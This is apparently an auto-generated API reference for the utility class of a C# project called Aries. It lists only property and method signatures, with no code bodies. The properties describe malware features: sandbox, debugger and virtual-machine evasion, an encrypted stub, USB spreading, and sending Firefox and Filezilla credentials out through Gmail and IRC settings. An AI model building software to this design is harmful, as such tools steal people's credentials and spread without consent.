C# Class Aries.Util

Show file Open project: EAXrec/Aries

Public Properties

Property Type Description
AESClass SimpleAES
AntiSandbox bool
AntiSniffDebug bool
AntiSysinternals bool
AntiVirtual bool
CrashType int
DisplayErrorMsg bool
DisplayInVirtual bool
EncryptHost bool
ErrorBody string
ErrorTitle string
FSplit string
FSplit2 string
FSplit3 string
FSplit4 string
GmailPass string
GmailUser string
OriginalSize int
PackedSize int
ProtectNum string
SendFirefoxFilezilla bool
USBSpread bool
UseRandomNick bool
compressed bool
encryptionkey byte[]
file1TargetFileOutput string
msgIcon string
stub string

Public Methods

Method Description
IsProcessRunning ( string file_name ) : bool

Check for a process name and window title

Reverse ( string x ) : string

Reverse a string

getRandNum ( int length ) : string

Return a string of random letters (removed numbers for more compatible use)

Private Methods

Method Description
GetModuleHandle ( string lpModuleName ) : IntPtr

Method Details

IsProcessRunning() public static method

Check for a process name and window title
public static IsProcessRunning ( string file_name ) : bool
file_name string Process or window title to check for
return bool

Reverse() public static method

Reverse a string
public static Reverse ( string x ) : string
x string String to reverse
return string

getRandNum() public static method

Return a string of random letters (removed numbers for more compatible use)
public static getRandNum ( int length ) : string
length int Length of random string to return
return string

Property Details

AESClass public static property

public static SimpleAES AESClass
return SimpleAES

AntiSandbox public static property

Anti Sandboxie
public static bool AntiSandbox
return bool

AntiSniffDebug public static property

Anti Sniffers/Debuggers
public static bool AntiSniffDebug
return bool

AntiSysinternals public static property

Anti Sysinternals products
public static bool AntiSysinternals
return bool

AntiVirtual public static property

Anti Virtual Environment
public static bool AntiVirtual
return bool

CrashType public static property

Numeric value for the way that the program will end itself
public static int CrashType
return int

DisplayErrorMsg public static property

Anti Sandboxie
public static bool DisplayErrorMsg
return bool

DisplayInVirtual public static property

Display the error msg if it's enabled and if running in a Virtual Environement
public static bool DisplayInVirtual
return bool

EncryptHost public static property

Encrypt the host file?
public static bool EncryptHost
return bool

ErrorBody public static property

Body of the error msg to display if enabled
public static string ErrorBody
return string

ErrorTitle public static property

Title of the error msg to display if enabled
public static string ErrorTitle
return string

FSplit public static property

public static string FSplit
return string

FSplit2 public static property

public static string FSplit2
return string

FSplit3 public static property

public static string FSplit3
return string

FSplit4 public static property

public static string FSplit4
return string

GmailPass public static property

Gmail Password
public static string GmailPass
return string

GmailUser public static property

Gmail Username
public static string GmailUser
return string

OriginalSize public static property

Original size of the target file
public static int OriginalSize
return int

PackedSize public static property

public static int PackedSize
return int

ProtectNum public static property

public static string ProtectNum
return string

SendFirefoxFilezilla public static property

Send Firefox/Filezilla info after running 1st time
public static bool SendFirefoxFilezilla
return bool

USBSpread public static property

Spread to USB drives after running 1st time
public static bool USBSpread
return bool

UseRandomNick public static property

use a random irc nick
public static bool UseRandomNick
return bool

compressed public static property

Compress the target file?
public static bool compressed
return bool

encryptionkey public static property

Encryption key used for AES
public static byte[] encryptionkey
return byte[]

file1TargetFileOutput public static property

The target file contents, stored in a string
public static string file1TargetFileOutput
return string

msgIcon public static property

public static string msgIcon
return string

stub public static property

string to store the stub in
public static string stub
return string